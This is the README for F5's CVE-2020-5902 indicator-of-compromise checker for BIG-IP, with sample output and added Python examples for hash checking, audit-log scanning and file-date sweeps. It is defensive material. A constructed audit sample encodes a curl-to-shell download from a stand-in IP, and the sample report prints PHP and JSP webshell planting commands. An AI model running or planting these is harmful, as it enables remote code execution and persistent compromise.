This script is intended to be executed locally on an F5 BIG-IP in Advanced Shell (bash) by a user with root privileges; it is not intended to be run in any other setting. Note: Appliance Mode does not allow access to Advanced Shell, and therefore this tool cannot be run on such systems.
The script examines the BIG-IP for the Indicators of Compromise (IoCs) associated with CVE-2020-5902 that were known to F5 Networks at the time of authoring. It collates these IoCs and presents them as an overview report you can use to decide the best path forward. If the tool uncovers any IoCs, examine and confirm them manually, then follow your own documented procedures for handling suspected compromised systems. F5-specific guidance may be found in K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system.
Note: If you have any uncertainty or doubt as to the integrity of any system, the cautious approach is to consider the system compromised and to follow your internal procedures for handling a compromised system. Note also that any information contained on a compromised system should itself be considered compromised. This includes, but is not limited to, passwords, private keys, digital certificates, configurations, logs, etc.
Note that IoCs may no longer be present, either because of age (for example, log rotation) or because a sufficiently skilled adversary removed them. Since exploitation of CVE-2020-5902 can result in remote code execution as the root user, a skilled attacker is free to sanitize the system of traces after exploitation.
Note also that an attacker could poison any binary on the system, including python. Reasonable steps have been taken to avoid the possibility of this; however, you must determine your level of trust in the output of this tool on any system suspected to be compromised.
On BIG-IP versions that include sys-eicheck (13.1.0 onward), this tool offers the administrator the opportunity to check the running system against the original installation RPMs to look for any file modifications in an attempt to ensure the integrity of the system commands this tool relies upon. Note that sys-eicheck can be run on all platforms regardless of FIPS capability.
On earlier versions the tool does not currently include this functionality and will run without checking the originally installed system binaries for tampering.
The sha384 sum of this version of CVE-2020-5902_bigip_ioc_checker.py is: 1583bc8b6a52c71bb49fce26c6f67be2c65aa1f42c433a13fc79616f01a84994b76eaa8ff4bc19ef7833b8f145ba6136
You should only download these files from the F5 DevCentral GitHub repository.
Note that the authoritative source of information on CVE-2020-5902 is always the F5 Security Advisory, K52145254: TMUI RCE vulnerability CVE-2020-5902.
Simply download the file CVE-2020-5902_bigip_ioc_checker.py to the target BIG-IP and run it using the python installation already present on BIG-IP. Before running it, confirm that the file's sha384 sum matches the value given above.
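The following is an added example for this page, not part of the F5 tool: a small Python 3 script that checks a downloaded copy of CVE-2020-5902_bigip_ioc_checker.py against the sha384 sum published above. Run it on a trusted workstation before copying the script to the BIG-IP; hashing the file on a system you suspect is compromised proves little, since the hashing tool there may itself have been replaced (see the note above about poisoned binaries). The file name default and the exit behaviour are the example's own choices.

```python
"""Check a downloaded copy of the IoC checker against the published SHA-384 digest.

Added example for this page, not part of the F5 tool. Run it with Python 3 on a
trusted workstation before copying the script to the BIG-IP. The equivalent
shell check is: sha384sum CVE-2020-5902_bigip_ioc_checker.py
"""
import hashlib
import hmac
import os
import sys

# Digest published on this page for the current version of the script.
PUBLISHED_SHA384 = (
    "1583bc8b6a52c71bb49fce26c6f67be2c65aa1f42c433a13fc79616f01a84994"
    "b76eaa8ff4bc19ef7833b8f145ba6136"
)


def sha384_of_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-384 and return the lowercase hex digest."""
    digest = hashlib.sha384()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_sha384(path, expected_hex=PUBLISHED_SHA384):
    """True only if the file's digest equals expected_hex (hex case and whitespace ignored)."""
    actual = sha384_of_file(path)
    # compare_digest keeps the comparison time independent of where a mismatch occurs.
    return hmac.compare_digest(actual, expected_hex.strip().lower())


if __name__ == "__main__":
    # Default file name is the one this page tells you to download (example's choice).
    target = sys.argv[1] if len(sys.argv) > 1 else "CVE-2020-5902_bigip_ioc_checker.py"
    if not os.path.isfile(target):
        sys.exit("no such file: %s" % target)
    if verify_sha384(target):
        print("OK: %s matches the published SHA-384" % target)
    else:
        print("MISMATCH: do not run %s; fetch it again from the F5 DevCentral GitHub repository" % target)
        sys.exit(1)
```

A mismatch means the copy is not the version this page describes, whether because of a newer release, a corrupted transfer, or tampering; in every case, obtain the file again from the repository rather than running it.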
Example:
[root@hostname:Active:Standalone] tmp # python CVE-2020-5902_bigip_ioc_checker.py -h
USAGE: python CVE-2020-5902_bigip_ioc_checker.py
You can use the following options <-iajylcbwut> to skip some checks:
Option: -i or --skip_sys-eicheck
[+] Skip using the sys_eicheck utility to scan the BIG-IP system for any unexpected changes to the system software.
[+] Please refer to https://support.f5.com/csp/article/K00029945 for more details about the sys-eicheck utility.
[+] The sys-eicheck utility may take several minutes to finish.
Option: -a or --skip_audit_check
[+] Skip scanning the audit log for malicious activities.
Option: -j or --skip_journal_check
[+] Skip scanning the journal log for malicious activities.
Option: -y or --skip_systems_check
[+] Skip scanning /config/bigip_user.conf to look for malicious users.
Option: -l or --skip_alias_check
[+] Skip scanning /config/bigip_*.conf for malicious alias definition.
Option: -c or --skip_catalina_check
[+] Skip scanning the tomcat catalina.out log for malicious activities.
Option: -b or --skip_bigipstartup_check
[+] Skip checking if /config/startup contains blacklisted words.
Option: -w or --skip_webshell_check
[+] Skip checking Files created after 2020 Jun 29 in the /usr/local/www/ to look for possible webshell files.
Option: -u or --skip_autostart_check
[+] Skip checking Files created after 2020 Jun 29 in /etc/ to look for the possible autostart script.
Option: -t or --skip_tmp_check
[+] Skip checking Files created after 2020 Jun 29 in /tmp
Option: -p or --disable_color_print
[+] Disable color print, better for saving result
Option: -q or --bigiq_cmd_check
[+] Run BIG-IQ compatible malicious command check
Option: -h or --help
[+] Print usage
If a BIG-IP is managed by BIG-IQ or another automation/management system, it may receive bash commands from that system. Some of these bash commands have a base64-encoded script embedded. When such commands are logged in the BIG-IP audit logs, the IoC Detection Tool can report the false-positive notification "!! IoC pattern malicious bash command found". To reduce these false positives, use the -q option so that the IoC Detection Tool ignores legitimate base64-encoded scripts in the audit logs.
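The following is an added example, not part of the F5 tool, that sketches the shape of the audit-log check and of the -q style allowlisting described above in Python 3: it finds bash commands that pipe a base64 payload into a shell, decodes the payload so you can read what was run, and optionally drops payloads that a trusted management system is known to send. The audit lines are constructed in a simplified format (real BIG-IP audit lines differ), and the TRUSTED_SCRIPT_MARKERS value is an assumption standing in for whatever marker your BIG-IQ or automation scripts actually carry; how the real tool decides that a script is legitimate is not documented on this page.

```python
"""Find audit-log bash commands that execute a base64-encoded script.

Added example for this page, not part of the F5 tool. Python 3. The log
lines below are constructed, and TRUSTED_SCRIPT_MARKERS is an assumption.
"""
import base64
import binascii
import re

# One common shape of an encoded-payload command: echo <base64> | base64 -d | sh
B64_EXEC = re.compile(
    r"echo\s+['\"]?(?P<blob>[A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d\w*|--decode)\s*\|\s*(?:ba)?sh\b"
)

# Assumption: the first line a trusted management system puts in the scripts it sends.
TRUSTED_SCRIPT_MARKERS = ("# managed-by: big-iq",)


def decode_blob(blob):
    """Return the decoded payload as text, or None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_audit_lines(lines, ignore_trusted=False):
    """Return [(line_no, decoded_script_or_None)] for lines that pipe base64 into a shell.

    ignore_trusted plays the role of the tool's -q option: payloads whose decoded
    text starts with a trusted marker are dropped. A blob that does not decode is
    still reported (script=None): the log says it was executed, so it needs a look.
    """
    hits = []
    for no, line in enumerate(lines, 1):
        m = B64_EXEC.search(line)
        if not m:
            continue
        script = decode_blob(m.group("blob"))
        if ignore_trusted and script is not None \
                and script.lstrip().lower().startswith(TRUSTED_SCRIPT_MARKERS):
            continue
        hits.append((no, script))
    return hits


def _b64(text):
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# Constructed sample (simplified format; not real BIG-IP audit output).
# Line 4 carries a blob with its padding stripped, so it cannot be decoded as written.
SAMPLE_AUDIT_LOG = [
    'Jul 20 14:49:01 bigip1 AUDIT user=admin cmd_data=run util bash -c "tmsh list ltm virtual"',
    'Jul 20 14:49:05 bigip1 AUDIT user=bigiq_svc cmd_data=run util bash -c "echo %s | base64 -d | bash"'
    % _b64("# managed-by: big-iq\ntmsh save sys config\n"),
    'Jul 20 14:49:30 bigip1 AUDIT user=admin cmd_data=run util bash -c "echo %s | base64 -d | bash"'
    % _b64("curl -s http://198.51.100.7/x.sh | sh\n"),
    'Jul 20 14:50:02 bigip1 AUDIT user=admin cmd_data=run util bash -c "echo QUJDREVGR0hJSktMTU5PUA | base64 -d | sh"',
]


if __name__ == "__main__":
    for no, script in scan_audit_lines(SAMPLE_AUDIT_LOG, ignore_trusted=True):
        print("!! line %d: base64 payload executed -> %r" % (no, script))
```

Run without ignore_trusted, the scan reports lines 2, 3 and 4; with it, the BIG-IQ style script on line 2 is dropped and the curl-to-shell payload on line 3 and the undecodable blob on line 4 remain. Allowlisting on the decoded content rather than on the user name matters: an attacker with root can write audit entries under any account, but cannot make a hostile payload decode to a trusted script.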
Upgrading the system may update the timestamps on files in /usr/local/www/, which can produce false positives from the file creation date check, for example when the fixed software was installed recently.
If any results are returned for any of the file creation date checks (/usr/local/www/, /etc/, and /tmp/), examine the listed files to determine whether they are legitimate.
Indicators of Compromise may still be found in the journalctl logs after an upgrade to a fixed version or after applying the workaround. If such entries are present, review their timestamps and verify that they occurred before the upgrade or the workaround was applied.
# python CVE-2020-5902_bigip_ioc_checker.py -iqa
>>>> Skip sys-eicheck check
>>>> Run BIG-IQ compatible malicious command check
>>>> Skip audit log check
CVE-2020-5902 Indicators of Compromise checker. False positive reports are possible and all results should be manually verified.
[+] Version 13.1.0 Build 0.0.1868 CVE-2020-5902 Fixed: False
!! IoC pattern ['/etc/fakefile', '/etc/passwd', '/etc/fakefile1'] access denied in file /var/log/tomcat/catalina.out
!! IoC pattern ['/config/bigip_base.conf'] access denied in file /var/log/tomcat/catalina.out.1
!! IoC pattern Possible backdoor echo "<?php eval(\$_REQUEST[09ede7]);" > /usr/local/www/xui/common/css/webshell.php in file /config/startup
!! IoC pattern Possible backdoor echo "Runtime.getRuntime().exec("cmd.exe /C " + cmd);" > /usr/local/www/xui/common/css/webshell.jsp in file /config/startup
[+]========================== auto start script checking ==========================
!! Files created in /etc/ after 2020 Jun 29, need to check if those are malicious daemon startup script
95291 1 -rw-r--r-- 1 root root 0 Jul 20 14:49 /etc/rc.d/init.d/autostartbackdoor
104847 4 -rw------- 1 root root 199 Jul 13 10:46 /var/spool/cron/root
[+]================================ /tmp/ checking ================================
!! File /tmp/backdoor_curl could be a malicous script
!! File /tmp/CVE-2020-5902_bigip_ioc_checker.py could be a malicous script
!! Files created in /tmp/ after 2020 Jun 29, need to check if those are malicious scripts
18491 40 -rw-r--r-- 1 root root 38066 Jul 20 14:57 /tmp/CVE-2020-5902_bigip_ioc_checker.py
18497 1 -rw-r--r-- 1 root root 0 Jul 20 14:49 /tmp/backdoor_new
[+]============================== webshell checking ==============================
!! Files created in /usr/local/www/ after 2020 Jun 29, need to check if those are webshell or information leakage
243368 4 -rw-r--r-- 1 root root 33 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.php
243367 4 -rw-r--r-- 1 root root 33 Jul 17 08:30 /usr/local/www/xui/common/css/css.php
243369 4 -rw-r--r-- 1 root root 46 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.jsp
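The following is an added example, not the F5 tool's code, that reproduces the shape of the file creation date checks shown in the "auto start script checking", "/tmp/ checking" and "webshell checking" sections above and adds what a responder usually wants next. It is written for Python 3 and meant to run against a copy of the suspect filesystem on an analysis host. Besides the tool's own signal (mtime after 2020 Jun 29), it reports files whose mtime predates the cutoff while their ctime does not: on Linux, ctime cannot be set from userland, so that combination means the file was either installed later with its timestamps preserved (which is what an upgrade does, hence the false-positive caveat above) or had its mtime backdated. It also flags server-side script files anywhere in a web root regardless of date. The sample tree, the WEBSHELL_EXTS list and the reason strings are the example's own; the file names merely echo the report above.

```python
"""Sweep directories for files changed after the CVE-2020-5902 cutoff date.

Added example for this page, not the F5 tool's code. Python 3, POSIX ctime
semantics. build_sample_tree() creates constructed data; nothing here came
from a real BIG-IP.
"""
import os
import stat
import tempfile
import time
from collections import namedtuple
from datetime import datetime

# Cutoff used by the tool's "created after 2020 Jun 29" checks.
CUTOFF_TS = datetime(2020, 6, 29).timestamp()
# Assumption: server-side extensions worth a look anywhere under a web root.
WEBSHELL_EXTS = (".php", ".jsp", ".jspx", ".cgi")

Finding = namedtuple("Finding", "path mtime ctime reason")


def check_directory(root, cutoff_ts=CUTOFF_TS, web_root=False):
    """Return sorted Findings for regular files under root that deserve a look."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; a real sweep should log this
            if not stat.S_ISREG(st.st_mode):
                continue
            reasons = []
            if st.st_mtime > cutoff_ts:
                reasons.append("modified after cutoff")
            elif st.st_ctime > cutoff_ts:
                # ctime moves on any inode change and cannot be forged from userland.
                reasons.append("mtime predates cutoff but ctime does not: "
                               "installed later with preserved timestamps, or backdated")
            if web_root and name.lower().endswith(WEBSHELL_EXTS):
                reasons.append("server-side script in web root")
            if reasons:
                findings.append(Finding(path, st.st_mtime, st.st_ctime, "; ".join(reasons)))
    return sorted(findings)


def by_name(findings):
    """Map file name -> reason, for quick inspection of a result set."""
    return {os.path.basename(f.path): f.reason for f in findings}


def build_sample_tree(base=None):
    """Create a constructed sample tree; returns (www_dir, tmp_dir)."""
    if base is None:
        base = tempfile.mkdtemp(prefix="ioc-sample-")
    www = os.path.join(base, "usr", "local", "www", "xui", "common", "css")
    tmp = os.path.join(base, "tmp")
    os.makedirs(www)
    os.makedirs(tmp)
    old = datetime(2019, 12, 1).timestamp()

    def write(path, body, mtime=None):
        with open(path, "w") as fh:
            fh.write(body)
        if mtime is not None:
            os.utime(path, (mtime, mtime))  # backdates mtime; ctime still moves to now

    write(os.path.join(www, "style.css"), "body{}", old)   # "old" file; ctime gives it away
    write(os.path.join(www, "webshell.jsp"), "<% %>")      # new server-side file in web root
    write(os.path.join(www, "css.php"), "<?php ?>", old)   # backdated server-side file
    write(os.path.join(tmp, "backdoor_curl"), "curl ...")  # new file in /tmp
    write(os.path.join(tmp, "old.log"), "", old)
    return www, tmp


def fmt(ts):
    return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(ts))


if __name__ == "__main__":
    www, tmp = build_sample_tree()
    for root, is_www in ((www, True), (tmp, False)):
        print("== %s ==" % root)
        for f in check_directory(root, web_root=is_www):
            print("%s  mtime=%s ctime=%s  %s" % (f.path, fmt(f.mtime), fmt(f.ctime), f.reason))
```

In the constructed tree every file has a current ctime, so every backdated file shows the mtime/ctime discrepancy; on a real BIG-IP the same discrepancy is what an upgrade leaves behind on package-owned files, so the finding is a prompt to check the file's origin (for example against the installation RPMs, as sys-eicheck does), not proof of tampering.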
F5 provides the CVE-2020-5902 IoC Detection Tool to help its customers analyze their F5 devices outside of iHealth for certain indicators of compromise related to CVE-2020-5902. Please note, however, that:
- The CVE-2020-5902 IoC Detection Tool is not comprehensive, nor is it intended to be: it does not identify all possible indicators of compromise, but only a select group that F5 has found to be generally reliable based on its internal analyses of compromised F5 devices.
- Not all compromised F5 devices show the same indicators and attackers may be able to remove traces of their work. It is not possible to prove that any device has not been compromised; if there is any uncertainty, additional analysis may be required and/or you may want to consult with your security team.
- To avoid undue interruption to a user’s business operations, the CVE-2020-5902 IoC Detection Tool should not be operated during peak traffic hours and should instead generally be used during users’ regular maintenance windows.
- If indicators of compromise are identified, F5 recommends that users follow their documented internal incident response procedures. F5 has provided general considerations and guidance for when a security compromise on a BIG-IP system is suspected in K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system. Additionally, users can contact F5 directly for additional support via the Customer Support Portal or other standard channels.
The CVE-2020-5902 IoC Detection Tool is made available for F5 users’ convenience and is provided on an “as is” basis under the terms of the Apache License. You use the CVE-2020-5902 IoC Detection Tool at your own risk.
Copyright © 2020 F5 Networks, Inc.
Licensed under the Apache License, Version 2.0 (the “License”); you may not use the CVE-2020-5902 IoC Detection Tool except in compliance with the License. You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.